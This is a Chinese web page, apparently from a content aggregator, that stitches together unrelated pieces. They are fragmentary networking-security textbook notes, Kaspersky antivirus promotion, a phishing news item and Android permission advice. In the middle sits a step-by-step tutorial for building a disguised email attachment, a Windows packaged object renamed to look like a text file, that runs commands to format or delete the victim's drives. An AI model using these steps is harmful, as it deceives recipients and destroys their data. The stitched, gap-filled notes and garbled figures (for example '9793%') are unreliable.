第七章、网络安全

第七章、网络安全,第1张

1)被动式攻击

2)主动式攻击

几种常见的方式:

① 篡改:

攻击者篡改网络上传送的报文,比如,彻底中断,伪造报文;

② 恶意程序:包含的种类有:

③ 拒绝服务(DoS,Denial of Service)

攻击者向互联网上的某个服务器不停地发送大量分组,使该服务器无法提供正常服务,甚至完全瘫痪。

④ 交换机攻击

攻击者向以太网交换机发送大量伪造源 MAC地址的帧,交换机收到MAC地址后,进行学习并记录,造成交换表很快被填满,无法正常工作。

人们一直希望能够设计出一种安全的计算机网络,但不幸的是,网络的安全性是不可判定的,只能针对具体的攻击设计安全的通信协议。

计算机网络安全的四个目标

1)保密性:要求只有信息的 发送方 接收方 才能懂得所发送信息的内容,而信息的截获者则看不懂所截获的内容。以此,对付 被动攻击

2)端点鉴别:要求计算机网络必须能够 鉴别 信息的 发送方 接收方 的真实身份。对付 主动攻击

3)信息的完整性:要求信息的内容没有被人篡改过;

4)运行的安全性:要求计算机系统运行时的安全性。 访问控制 是一种应对方法。对付 恶意程序 拒绝服务攻击

发送者向接受者发送明文 P,通过加密算法运算,得到密文 C。接收端通过解密算法解密,得到明文P。

如果不论截取者获得多少密文,但在密文中都没有足够的信息来唯一的确定出对应的明文,则这一密码体制称为 无条件安全的 ,或成为 理论上是不可破的

在无任何限制的条件下,目前几乎所有的密码体制均是可破的。

人们关心的是研制出 在计算机上(而不是理论上)是不可破的密码体制 。如果一个密码体制中的密码,不能在一定时间内被可以使用的计算机资源破译,那么这一密码体制称为 在计算上是安全的

2)发展史

对称密码体制,也就是, 加密密钥 解密密钥 使用相同的密码体制。

1)数据加密标准(DES)

属于对称密钥密码体制。1977年,由 IBM公司提出,被美国定位联邦信息标准,ISO 曾将 DES 作为数据加密标准。

2)高级加密标准(AES)

1976年,由斯坦福大学提出,使用不同的 加密密钥 解密密钥

1)公钥密码出现的原因

① 对称密钥密码体制的密钥分配问题;

② 对数字签名的需求。

2)对称密码的挑战

对称密码体制中,加密/解密的双方使用的是 相同的密钥

那么,如何让双方安全的拥有相同的密钥?

① 事先约定:给密钥管理和更换带来极大的不便;

② 信使传送:不该用于高度自动化的大型计算机系统;

③ 高度安全的密钥分配中心:网络成本增加;

3)三种公钥

① RSA 体制:1978年正式发表,基于数论中的大数分解问题的体制;

4)差异:

公钥加密算法开销较大,并不会取代传统加密算法。

5)密码性质

任何加密算法的安全性取决于密钥的长度,以及攻破密文所需的计算量。

书信或文件是根据亲笔签名或印章来证明其真实性的。(伪造印章,要坐牢)

1)核实:接受者能够核实发送者对报文的签名,也就是,确定报文是否是发送者发送的;

2)无篡改:接受者确信所收到的数据和发送者发送的完全一样,没有被篡改过。称为 报文的完整性

3)不可否认:发送这时候不能抵赖对报文的签名,叫 不可否认

1)A用其私钥对报文进行D运算,获得密文;

2)接收方,通过A的公钥解密,核实报文是否是A发送的。

1)核实保证:只有A有私钥,加密有唯一性;

2)无篡改:篡改后,无A的私钥,无法加密;

3)不可否认:其他人无A的私钥;

疑问:是否利用产生一个A的公钥可以解密的私钥,就可以冒充A?

上述 *** 作,对数据进行了签名,但是,没有对数据进行加密。所有,拥有公钥的人都可以破解。

1)具有保密性的数字签名:

① 发送方,利用A的私钥对数据进行签名;

② 发送方,利用B的公钥对数据进行加密;

③ 接收方,利用B的私钥对数据进行解密;

④接收方,利用A的公钥对数据进行鉴权。

鉴别 是要验证通信的双方确实是自己所要通信的对象,而不是其他的冒充者。

并且,所传送的报文是完整的、没有被他人篡改过。

0)动机

① 数字签名:就是一种报文鉴别技术;

② 缺陷:对较长的报文进行数字签名会给计算机增加非常大的负担,因此这就需要进行较多的时间来进行计算;

③ 需求:一种相对简单的方法对报文进行鉴别;

④ 解决办法:密码散列函数;

1)密码散列函数

作用:保护明文的完整性;

散列函数 的特点:

密码散列函数 的特点:

2)实用的密码散列函数:MD5 和 SHA-1

① MD5

② SHA

美国技术标准协会 NIST 提出 SHA 散列算法。

3)报文鉴别码

① 散列函数的缺点:可能被其他人篡改,然后,计算相应的正确散列值;

② 报文鉴别码:生成报文的散列后,对散列进行加密生成报文鉴别码;

1)差别

2)鉴别方法

A向远端的B发送带有自己身份A和口令的报文,并使用双方约定好的共享对称密钥进行加密;

3)存在的问题

可能攻击者处于中间人,冒充A向B发送口令,并发送公钥,最后,成功冒充A,获取A的重要数据;

4)总结

重要问题:公钥的分配,以及公钥的真实性。

密码算法是公开的,网络安全完全基于密钥,因此 密钥管理 十分重要;包括:

1)挑战

① 密钥数量庞大:n个人相互通信,需要的密钥数量 n(n-1);

② 安全通信:如何让通信双方安全得到共享密钥;

2)解决方案

密钥分配中心:公共信任的机构,负责给需要秘密通信的用户临时分配一个会话密钥(使用一次);

3)处理过程

① 用户 A 发送明文给蜜月分配中心 KDC,说明想和用户 B通信。

② KDC 随机产生 “一次一密” 的会话密钥KAB,然后,用KA加密发送给A 密钥KAB和票据。

③ B收到A转来的票据,并根据自己的密钥KB解密后,就知道A要和他通信,并知道会话密钥KAB。

4)

这一系统现在已广泛用于电子护照中,也就是下一代金融系统使用的加密系统。

移动通信带来的广泛应用,向网络提出了更高的要求。

量子计算机的到来将使得目前许多使用中的密码技术无效,后两字密码学的研究方兴未艾。

下面我就将恶意程序的制作方法教给大家:

1创建一个只包含一个空格(为了减小文件体积)的文本文件,任意取名。

2打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击记{写字板文档}单栏中的“插入\对象”,d出“插入对象”对话框,选中“从文件创建”,然后点击“浏览”按钮选择要插入的文件。

3选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”(如图1)。在d出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下命令:startexe /m format c:/q /autotest /u ,点击“确定”,此时,内容栏中会显示出命令内容。

4点击外观栏中的“插入图标”按钮,会d出一个警告对话框,确认,然后任选一个图标。

5选择菜单栏中的“编辑\卷标”,为此嵌入对象取一个名称(会替换原来的文件名称)。点击“文件”菜单中的“更新”,然后关闭此对话框。

6将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”(在2000下的默认名为"片段"),现在我们把它改成“password01txt”。打开电子邮件程序将桌面上的“password01txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作为附件发出。

7当邮件接收者误将“password01txtshs”文件作为“password01txt”(如前文所述,“SHS”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对象时触发恶意命令(d出DOS运行窗口,执行格式化命令).如果将上面的命令替换为:startexe /m deltree /y a:\ c:\ d:\ 则是将删除对方硬盘下所有文件(盘符根据实际情况自定义);如果替换为:startexe /m deltree /y c:\windows\system\ 则是删除对方c:\windows\system\目录底下的所有文件.(当然大家可以改成其它的命令)

(切记:仅供学习与研究,切莫用来攻击他人,更不要在没有安全准备的情况下执行上面的文件,呵呵!)

建议你装杀毒软件,360安全卫士基于卡巴斯基

Kaspersky(卡巴斯基)杀毒软件来源于俄罗斯,是世界上最优秀、最顶级

的网络杀毒软件,查杀病毒性能远高于同类产品。卡巴斯基杀毒软件具有超强的

中心管理和杀毒能力,能真正实现带毒杀毒!提供了一个广泛的抗病毒解决方案

。它提供了所有类型的抗病毒防护:抗病毒扫描仪、监控器、行为阻段、完全检

验、E-mail通路和防火墙。它支持几乎是所有的普通 *** 作系统。卡巴斯基控制所

有可能的病毒进入端口,它强大的功能和局部灵活性以及网络管理工具为自动信

息搜索、中央安装和病毒防护控制提供最大的便利和最少的时间来建构你的抗病

毒分离墙。卡巴斯基抗病毒软件有许多国际研究机构、中立测试实验室和IT出版

机构的证书,确认了卡巴斯基具有汇集行业最高水准的突出品质。

个人评价:Kaspersky Anti-Virus Pro v50

这是我用的时间最长的杀毒软件,也是大多BS国产杀毒软件的人首选的杀毒软件

,对于Kaspersky我也不必多费口水(大家太熟悉了啊!)。

主要特点:1杀毒能力特强;2病毒库升级频繁(大概1-4小时就更新);3查

壳能力强;4通过选项设置可以适合不同需要的人。

缺点:1用Kaspersky的人最怕中病毒——那个杀猪般的叫声让人受不了;2监控

能力差了点,而且用起来一个字“卡”,很占内存;3杀毒速度慢,如果你实在

害怕病毒,而且喜欢玩专业,愿意牺牲性能换来安全,你就用卡巴斯基吧!

国家互联网金融安全技术专家委员会的监测数据显示,截至2018年6月底,互联网金融仿冒网页已超过47万个,受害用户达11万人次。专家指出,山寨网站以假乱真,用户稍有不慎便会“入坑”,导致个人隐私信息泄露甚至被不法分子骗取钱财。

“虚假钓鱼网站通常伪装成银行、电商等涉及在线支付 *** 作的网站,意在窃取用户银行账号、密码等信息。”南京大学社会学系教授陈云松在接受媒体采访时分析,网民在登录此类网站时应提高安全风险意识,“比如尽量使用主流浏览器并开启钓鱼网站拦截功能,对资质和安全性存疑的网站,也可通过权威数据库先查询确认。”

中国社会科学院新闻与传播研究所新闻学研究室主任黄楚新也建议,斩断虚假钓鱼网站背后的黑色产业链,需要监管部门严控全过程、覆盖全环节,既要通过网站实名备案制严把传播源头,也要通过动态监测机制和追踪技术,及时发现可疑的网络欺诈链接。

2018年5月,工信部发布《关于纵深推进防范打击通讯信息诈骗工作的通知》,要求加强钓鱼网站和恶意程序整治,有效降低网络诈骗威胁风险。加强对仿冒政府、教育、金融机构等钓鱼网站和涉嫌诈骗类恶意程序的监测分析和信息共享;及时依法处置钓鱼网站和诈骗类恶意程序;及时提醒诈骗类钓鱼网站和恶意程序风险情况。来源:

新华网

金山不好用,建议用瑞星或卡巴,因为:

建议使用卡巴斯基,超强的杀毒算法,但是时间和内存用的多,世界最高的病毒狙击率,特征码量不是第一,但可杀度量绝对第一,因为超强的脱壳算法,一个特征码,顶别人十几条

下面我们先来看看最新的杀毒软件病毒阻杀率排行榜

杀毒软件 病毒阻杀率

Kaspersky Personal Pro version 50 9793%

AVK version 1505 93%

F-Secure 2005 9755%

eScan Virus Control version 9675%

Norton Corporate version 9164%

Norton Professional version 2005 9157%

McAfee version 90 8975%

Virus Chaser version 50 8831%

BitDefender version 80 8813%

CyberScrub version 8787%

Panda Platinum 2005 8775%

version 75%

Arcavir 8773%

MKS_VIR 2005 8770%

RAV version 8726%

F-Prot version 8707%

卡巴斯基

在国内卡巴斯基不像诺顿那样有名,可能许多人还比较陌生,在这里重点介绍下。卡巴斯基总部设在俄罗斯首都莫斯科,Kaspersky Labs是国际著名的信息安全领导厂商。公司为个人用户、企业网络提供反病毒、防黒客和反垃圾邮件产品。经过十四年与计算机病毒的战斗,卡巴斯基获得了独特的知识和技术,使得卡巴斯基成为了病毒防卫的技术领导者和专家。该公司的旗舰产品-著名的卡巴斯基反病毒软件(Kaspersky Anti-Virus,原名AVP)被众多计算机专业媒体及反病毒专业评测机构誉为病毒防护的最佳产品。 1989年,Eugene Kaspersky开始研究计算机病毒现象。从1991年到1997年,他在俄罗斯大型计算机公司“KAMI”的信息技术中心,带领一批助手研发出了AVP反病毒程序。Kaspersky Lab于1997年成立,Eugene Kaspersky是创始人之一。

2000年11月,AVP更名为Kaspersky Anti-Virus。Eugene Kaspersky是计算机反病毒研究员协会(CARO)的成员,该协会的成员都是国际顶级的反病毒专家。AVP的反病毒引擎和病毒库,一直以其严谨的结构、彻底的查杀能力为业界称道。 俄罗斯杀毒软件之所以非常强大,是因为俄罗斯有国际顶尖的数理科技领域的特殊人才及优良的传统,这些专业人才的培养不是三年两载就能成功的。卡巴斯基基本都是一年破解升级,杀毒能力天下第一,你也看到了世界排行第一名,感觉专业就是专业,但是监控能力差了点,而且用起来一个字"卡",很占内存,无论时搭配自带的卡巴斯基防火墙还是ZA防火墙启动都比较慢,也许是因为太专业的原因吧,如果你实在害怕病毒,而且喜欢玩专业,愿意牺牲性能换来安全,你就用ZA搭配卡巴斯基吧!

下面是有关卡巴斯基的资料:

1、对病毒上报反应迅速,卡巴斯基具有全球技术领先的病毒运行虚拟机,可以自动分析70%左右未知病毒的行为,再加上一批高素质的病毒分析专家,反应速度就是快于别家。每小时升级病毒的背后是以雄厚的技术为支撑的。

2、对任何上报病毒的用户不问正版,D版,病毒分析师一律回信,有时还详细给出分析结论的依据,体贴呵护用户,有时我想就算写信和他们鬼扯,他们也会回复的,以前一直用D版心里不免愧疚,当网易降价销售卡巴的时候,赶紧去买套正版。这就是卡巴斯基,轻易征服潜在用户的杀毒软件公司。

3、随时修正自身错误,杀毒分析是项繁琐的苦活,卡巴斯基并不是不犯错,而是犯错后立刻纠正,只要用户去信指出,误杀误报会立刻得到纠正。知错就改,堪称其他杀软的楷模,你去试试看给symantec纠错,会是什么结果。

4、卡巴斯基的引擎技术是国内外许多杀毒软件的核心,这是公认的事实,另外,国外的我不知道,国内的杀毒厂商,对上报病毒一律先卡巴扫一遍,这是很有趣的现象,你说,卡巴斯基是不是其他杀软的师傅。

5、卡巴斯基的毒库数量不是最高,但实际可杀病毒数量绝对是世界第一,这是因为,卡巴斯基的超强脱壳能力,无论你怎么加壳,只要程序体还能运行,就逃不出卡巴斯基的掌心,它总唱是你是你还是你。因此卡巴斯基毒库目前的15(近16万 在2006-1-10 有159926)多万病毒是真实可杀数量,某些杀软对病毒的加壳版要么傻眼要么列为变种,还沾沾自喜每天100多条升级,殊不知人家卡巴一条升级就顶你几十条了。

6、最重要的一点是,卡巴斯基对上报病毒的用户并没有物质奖励,但大家却趋之若鹜,原因在于:当我1小时前中了未知病毒,于是将病毒体文件发送给卡巴,然后悠悠然去洗澡吃饭,过1小时回来后,将卡巴斯基升级后,伴随着卡巴斯基悠扬的杀猪声响起,可恶的病毒被逐个扫除,那种心理快感和参与感,岂是别的杀软能够带给我们的?

卡巴斯基被过度神话了吗?是的,卡巴斯基确实是个神话,他是国内外其他杀毒软件厂商追赶的神话,也是用户心中永远不灭的神话!

卡巴斯基®反病毒软件单机版为家庭用户的个人电脑提供超级病毒防护,它具有最尖端的反病毒技术,时刻监控一切病毒可能入侵的途径,同时该产品应用独有的iCheckerTM技术,使处理速度比同类产品快3倍,而且它还应用第二代启发式病毒分析技术识别未知恶意程序代码,成功率约达100%,目前卡巴斯基病毒数据库样本数已经超过100000 万种并且拥有世界上最快的升级速度,每小时常规升级一次,以使系统随时保持抗御新病毒侵害的能力。

卡巴斯基®反病毒软件单机版可以基于 SMTP/POP3 协议来检测进出系统的邮件,可实时扫描各种邮件系统的全部接收和发出的邮件,检测其中的所有附件,包括压缩文件和文档、嵌入式OLE对象、及邮件体本身。它还新增加了个人防火墙模块,可有效保护运行Windows *** 作系统的PC,探测对端口的扫描、封锁网络攻击并报告,系统可在隐形模式下工作,封锁所有来自外部网络的请求,使用户隐形和安全地在网上遨游。

卡巴斯基®反病毒软件可检测出700种以上的压缩格式文件和文档中的病毒,并可清除ZIP、ARJ、CAB和RAR文件中的病毒。我们提供7×24小时全天候技术服务。

--------------------------------------------------------------------------------

卡巴斯基反病毒单机版( Kaspersky for Personal )

卡巴斯基反病毒单机版是个人用户的首选反病毒产品。时刻监控一切病毒可能入侵的途径,产品采用第二代启发式代码分析技术、iChecker实时监控技术和独特的脚本病毒拦截技术等多种最尖端的反病毒技术。界面简单、自动化程度高,而且几乎所有的功能都是在后台模式下运行,系统资源占用低。最具特色的是该产品每天两次更新病毒代码,更新文件只有3-20Kb,对网络带宽的影响极其微小,能确保用户系统得到最为安全的保护。

--------------------------------------------------------------------------------

卡巴斯基反病毒单机专业版( Kaspersky for Personal Pro )

卡巴斯基反病毒单机专业版是专为有经验的计算机高级用户而设计的。产品使用的是最新的Kaspersky Lab技术,除了普通的杀毒功能外,融合了过去只向企业级产品用户提供独特的功能组件,允许用户跟踪计算机上的所有数据变化,提供MS Office宏病毒保护,它们采用集中控制的方法,100% 的保护MS Office文档保护,实现数据完整性监控,抵御未知病毒,有效的实时保护,对电子邮件的所有内容都进行检查,保护磁盘数据的安全,独特的Script病毒捕获系统,全面查杀压缩文件,隔离被感染对象,完全的自动保护,万能的启动系统,选择了卡巴斯基反病毒单机专业版,就选择了最先进的单机版防病毒产品。

--------------------------------------------------------------------------------

卡巴斯基反黑客软件( Kaspersky Anti-Hacker )

互联网可能是非常危险的地方。黑客们使用危险的恶意程序向您的计算机发动洪水般的攻击,全面控制您的计算机。您被各种间谍程序包围,这些间谍程序可偷窃密码、可取空银行账户、可监视您的计算机 *** 作、可利用您的计算机大量发送垃圾邮件和DoS攻击、可将您的机要数据发给企图非法使用这些数据的人。所有这些,都可能是在您毫无觉察或未表赞同的情况下发生和实现的。

卡巴斯基®反黒客软件,卡巴斯基实验室研发的个人防火墙,向您提供可靠的、可抗御所有上述威胁的防护。

卡巴斯基®个人安全套装(汉化包)是你安装了英文版卡巴斯基时,个你的汉化包

卡巴斯基反病毒单机版在家用比较好

Android权限对于开发者来说既是最好的朋友,也是最坏的敌人。即便是优秀且有信誉的应用开发人员和公司,也需要深度的Android权限以保证基础性的功能。另一方面,虽然Android恶意应用在安装之前会列出一长串的权限要求,很少有人谨慎的将它读完,以至于让恶意程序顺利的在我们自己的授权下进入到手机中。既然Android系统的这一双面剑式特征无法改变,那么我们应该如何做才能更放心一些呢 仔细阅读权限列表 对于年轻人和熟悉深度Android用户来说,他们几乎都能在Android应用市场中找到安全的官方应用,但并不是所有人都能办到,况且还存在一些漏网之鱼。所以如果你力求绝对安全,那么每当你安装一个应用的时候,都应该阅读一下这个列表,知道安装它的实际意义。有时那候一些应用要求相当多的权限仅仅是为了能够工作,就比如Gmail,但有些应用相对来讲要求较少,所以权限的多与少并不能评判一款应用是否是恶意应用。怎样辨别应用权限要求是否合理比如一款短信应用,它需要读取手机短信、联系人这是没什么问题的,但如果一个单机游戏应用,还要求联系人和短信权限,那么就要注意了。 其实一般的应用还好,最需要注意的应该是那些要求Root的应用。当你Root了你的Android手机,就意味着你授予了这些应用更高级别的权限:深入到系统OS层面。所以每当有应用要求Root,那么你都要认真的考虑它们是否真的有这个必要。一些ROM管理器应用确实需要Root,因为他们要进入到手机系统中工作,但若是一个时钟应用,还要求启动Root,那在点击“允许”之前,你一定要确保自己明白它为什么需要Root。 当心那些没有任何理由就要求权限组合的应用 绝大多数情况下,单一的权限基本都是无害的,要求开放互联网权限也不会怎么样,可能是为了显示广告,而我们真正要当心的,应该是那些不管三七二十一就要求组合权限的应用。比如加入你安装了一款内置广告的文件浏览应用,它需要你的存储空间以及互联网权限,这种情况下是没有办法阻止应用将你手机的系统文件,包括相片等上传的。 所以即便是那些来源可靠的应用,当你看到长串权限列表的时候,你也要问问自己如下这些问题: 这个应用的开发者值得信赖吗它看起来像恶意应用吗 如果这三个问题中有一个无法确定,那么你就要考虑是否真的需要这款应用了,即使是值得信赖的开发商推出的应用,也有可能收集大量的数据,无论是用户广告目的还是市场目的。倘若你看到一款应用来自于从未听到的开发者,且没有解释它需要这些权限的用途,那么最好远离它。 自己检测和检查应用程序权限 如果你真的很想安装一款应用,而它要求的权限中有一些是你不理解的,那么可以尝试下载一些专业的应用,去阻止侵入性应用**他们想要的用户信息,还有一些是可以监视你所安装的应用,看看它们是否在做一些见不得人的事情。例如: PDroid Privacy Protection(需要Root) 这款应用可以检测其他应用的权限,并允许你通过或禁止 *** 作。你可以为每款应用设置阻止前往个人信息,且不会破坏应用的进程。 LBE隐私卫士(需要Root) 这个应用有点像Android的防火墙,当一个应用试图获取你的数据的时候会提醒你,并让你做出允许或拒绝的决定。不过假如你否定了应用的某个权限,很有可能会造成应用的崩溃,所以我们在点击按键的时候一定要想好。另外,很多人更喜欢它的老版,新版本看似并没有得到Google Play的偏爱。 Permission Dog权限狗 这是一款国外媒体比较推崇的应用,因为通过它你可以一眼就能看出你安装的这些应用有多危险。只需要滑动滚动条就可以获知那个应用没问题,以及哪个应用需要多加留意。 Pocket Permissions掌上权限 Pocket Permissions是国外开发者推出的一个关于应用权限的解说教程,在可以帮助Android初学者的同时,也可以帮助对权限感兴趣的用户。比如它能告诉你每一个权限类型意味着什么,以及当这个权限被授权后能调取什么数据。此外,你还可以在Pocket Permissions中搜索权限,了解为什么应用需要这些权限,搜索哪些应用需要,它的风险或重要性等等。这真的是一部有价值的指南。 也许你会问,虽然中国的应用商店比较多,但多数都有安全认证机制,一些助手类工具甚至会联合多家安全机构进行多重认证,我们有必要非得去研究每个应用的权限吗事实是这样的,由于应用的复杂性,每个安全认证机制都有自己的标准,所以并不能百分百确定它到底是不是安全的。比如在一次的数据分享会上,我们得到一组数据:腾讯认为有问题的应用中有281%的应用是360和LBE都认为安全的;360认为危险的应用中有291%的应用是腾讯和LBE都认为是安全的;而LBE认为危险的应用中有768%的应用是360和腾讯都认为是安全的。所以,在纷杂的Android世界中,我们自己去认知应用的各项权限,还是很有必要的。

以上就是关于第七章、网络安全全部的内容,包括:第七章、网络安全、如何制作一个恶意代码、IE恶意程序等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zz/10127239.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-05
下一篇 2023-05-05

发表评论

登录后才能评论

评论列表(0条)

保存